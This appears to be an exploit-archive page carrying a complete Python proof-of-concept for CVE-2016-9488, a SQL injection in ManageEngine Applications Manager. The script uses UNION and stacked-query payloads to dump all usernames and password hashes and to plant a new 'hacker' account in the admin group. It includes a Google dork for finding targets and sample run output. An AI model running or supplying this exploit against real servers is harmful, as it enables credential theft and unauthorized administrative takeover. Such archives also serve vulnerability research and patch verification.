Search for hundreds of thousands of exploits

"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection"

Author

Exploit author

aldorm

Platform

Exploit platform

java

Release date

Exploit published date

2020-07-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
# Google Dork: intitle:"Applications Manager Login Screen"
# Date: 2020-07-23
# Exploit Author: aldorm
# Vendor Homepage: https://www.manageengine.com/
# Software Link:
# Version: 12 and 13 before Build 13200
# Tested on: Windows
# CVE : 2016-9488

#!/usr/bin/env python2

# App:          ManageEngine Applications Manager
# Versions:     12 and 13 before build 13200
# CVE:          CVE-2016-9488
# Vuln Type:    SQL Injection
# CVSSv3:       9.8
# 
# PoC Autor:    aldorm
# Release date: 23-07-2020

# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker
# [*] Extracting all users:
# 	 admin:21232f297a57a5a743894a0e4a801fc3
# 	 reportadmin:21232f297a57a5a743894a0e4a801fc3
# 	 systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3
# [*] Creating new user: 
# 	User: hacker 
#	Password: admin
# [*] Verifing created user...
# Success.


import sys 
import requests
import urllib3
import json


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target = 'localhost'

def get_userpassword():
    sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--'
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);
    j = json.loads(r.text)
    return j

def create_user():
    sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$);  -- '
    r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False);

    return 


def main ():
    if not len(sys.argv) > 2:
        print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0]
        print "e.g. %s manageengine 8443 " % sys.argv[0]
        sys.exit(1)

    global target
    global port
    target=sys.argv[1]
    port=sys.argv[2]

    print "[*] Extracting all users:"
    j = get_userpassword()
    for user in j["0"]:
        print "\t %s" % user[1]
    

    if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker':
        print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin"    
        create_user()
        print "[*] Verifing created user..."

        j = get_userpassword()
        for user in j["0"]:
            if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3":
                print "Success."
                return
        print "User not created."



if __name__ == '__main__':
    main()
Release DateTitleTypePlatformAuthor
2020-07-26"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection"webappsjavaaldorm
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48692/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.